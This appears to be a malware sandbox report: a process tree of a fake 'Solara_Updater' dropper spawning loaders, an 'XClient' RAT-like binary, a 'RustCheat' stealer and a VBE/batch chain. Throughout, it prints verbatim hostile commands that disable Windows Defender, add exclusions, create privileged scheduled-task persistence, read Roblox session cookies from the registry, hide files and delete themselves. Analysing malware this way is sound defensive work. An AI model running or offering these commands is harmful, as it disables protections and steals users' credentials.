C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1912
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"4⤵
- Creates scheduled task(s)
PID:1816
-
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2004
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"4⤵
- Views/modifies file attributes
PID:1652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:720
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:900
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵PID:2312
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:2260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Suspicious behavior: EnumeratesProcesses
PID:268
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:2992
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause4⤵PID:2948
-
C:\Windows\system32\PING.EXEping localhost5⤵
- Runs ping.exe
PID:2672
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"3⤵PID:2664
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "4⤵
- Loads dropped DLL
PID:1596 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2300 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zshxbpuc\zshxbpuc.cmdline"6⤵PID:2368
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8C67.tmp" "c:\Users\Admin\AppData\Roaming\CSCFBCF61A8141645BEAB9116A612B9A.TMP"7⤵PID:1344
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gnve3ylj\gnve3ylj.cmdline"6⤵
- Drops file in System32 directory
PID:1408 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8CA6.tmp" "c:\Windows\System32\CSC362901114F874F39A37D2928E62229.TMP"7⤵PID:268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\X6ugBa7n7B.bat"6⤵PID:2556
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:2560
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:2480
-
-
C:\Program Files (x86)\Common Files\Services\wscript.exe"C:\Program Files (x86)\Common Files\Services\wscript.exe"7⤵
- Executes dropped EXE
PID:1668
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"4⤵
- Executes dropped EXE
PID:1544
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"4⤵PID:2656
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "5⤵
- Loads dropped DLL
PID:2148 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"6⤵
- Executes dropped EXE
PID:1692
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"4⤵
- Executes dropped EXE
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"5⤵
- Executes dropped EXE
PID:2644
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2828 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid6⤵PID:2028
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"6⤵
- Views/modifies file attributes
PID:1548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 26⤵
- Suspicious behavior: EnumeratesProcesses
PID:1980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2704
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption6⤵PID:2604
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory6⤵PID:2720
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid6⤵PID:2612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2964
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name6⤵
- Detects videocard installed
PID:1780
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause6⤵PID:2268
-
C:\Windows\system32\PING.EXEping localhost7⤵
- Runs ping.exe
PID:484
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"4⤵
- Executes dropped EXE
PID:1808 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"5⤵PID:1352
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "6⤵
- Loads dropped DLL
PID:2532 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"7⤵
- Executes dropped EXE
PID:1624
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"4⤵PID:1136
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"5⤵
- Executes dropped EXE
PID:2616 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"6⤵
- Executes dropped EXE
PID:1256
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"6⤵
- Executes dropped EXE
PID:2476
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"5⤵
- Executes dropped EXE
PID:800 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"6⤵PID:768
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "7⤵
- Loads dropped DLL
PID:2324 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"8⤵
- Executes dropped EXE
PID:2960
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"5⤵PID:344
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"6⤵
- Executes dropped EXE
PID:2204 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"7⤵
- Executes dropped EXE
PID:2600
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"7⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:2040 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid8⤵PID:2748
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"8⤵
- Views/modifies file attributes
PID:2916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'8⤵
- Command and Scripting Interpreter: PowerShell
PID:2080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 28⤵PID:1548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY8⤵PID:908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY8⤵PID:2144
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption8⤵PID:2868
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory8⤵PID:2036
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid8⤵PID:1976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER8⤵PID:1936
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name8⤵
- Detects videocard installed
PID:2092
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause8⤵PID:892
-
C:\Windows\system32\PING.EXEping localhost9⤵
- Runs ping.exe
PID:2332
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"6⤵
- Executes dropped EXE
PID:2196 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"7⤵PID:2692
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "8⤵
- Loads dropped DLL
PID:568 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"9⤵
- Executes dropped EXE
PID:2864
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"6⤵PID:2708
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"7⤵
- Executes dropped EXE
PID:1516 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"8⤵
- Executes dropped EXE
PID:2156
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"8⤵
- Executes dropped EXE
PID:2160
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"7⤵
- Executes dropped EXE
PID:3044 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"8⤵PID:2576
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "9⤵
- Loads dropped DLL
PID:748 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"10⤵
- Executes dropped EXE
PID:2172
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"7⤵PID:332
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"8⤵
- Executes dropped EXE
PID:1636
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"8⤵
- Executes dropped EXE
PID:2160 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"9⤵PID:3060
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "10⤵
- Loads dropped DLL
PID:484 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"11⤵
- Executes dropped EXE
PID:2624
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"8⤵PID:1684
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"9⤵
- Executes dropped EXE
PID:2716
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"9⤵
- Executes dropped EXE
PID:1716 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"10⤵PID:2768
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "11⤵
- Loads dropped DLL
PID:908 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"12⤵
- Executes dropped EXE
PID:1084
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"9⤵PID:1208
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"10⤵
- Executes dropped EXE
PID:2712
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"10⤵
- Executes dropped EXE
PID:2024 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"11⤵PID:1824
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "12⤵
- Loads dropped DLL
PID:1304 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"13⤵
- Executes dropped EXE
PID:2868
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"10⤵PID:2704
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"11⤵
- Executes dropped EXE
PID:2944
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"11⤵
- Executes dropped EXE
PID:2632 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"12⤵PID:1728
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "13⤵
- Loads dropped DLL
PID:1080 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"14⤵PID:2700
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"11⤵PID:1944
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"12⤵
- Executes dropped EXE
PID:1904
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"12⤵
- Executes dropped EXE
PID:2960 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"13⤵PID:2436
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "14⤵
- Loads dropped DLL
PID:2280 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"15⤵PID:2612
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"12⤵PID:2132
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"13⤵
- Executes dropped EXE
PID:2432
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"13⤵
- Executes dropped EXE
PID:2000 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"14⤵PID:3068
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "15⤵
- Loads dropped DLL
PID:1748 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"16⤵PID:2712
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"13⤵PID:2624
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"14⤵
- Executes dropped EXE
PID:824
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"14⤵
- Executes dropped EXE
PID:1064 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"15⤵PID:2180
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "16⤵
- Loads dropped DLL
PID:1568 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"17⤵PID:776
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"14⤵PID:864
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"15⤵
- Executes dropped EXE
PID:3052
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"15⤵
- Executes dropped EXE
PID:1548 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"16⤵PID:3048
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "17⤵
- Loads dropped DLL
PID:2652 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"18⤵PID:2176
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"15⤵PID:1632
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"16⤵
- Executes dropped EXE
PID:1356
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"16⤵
- Executes dropped EXE
PID:2140 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"17⤵PID:468
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "18⤵
- Loads dropped DLL
PID:2704 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"19⤵PID:1604
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"16⤵PID:1500
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"17⤵
- Executes dropped EXE
PID:996
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"17⤵
- Executes dropped EXE
PID:2428 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"18⤵PID:2824
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "19⤵
- Loads dropped DLL
PID:2864 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"20⤵PID:2568
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"17⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"18⤵
- Executes dropped EXE
PID:1952 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"19⤵PID:1916
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"19⤵
- Drops file in Drivers directory
PID:2396 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid20⤵PID:2092
-
-
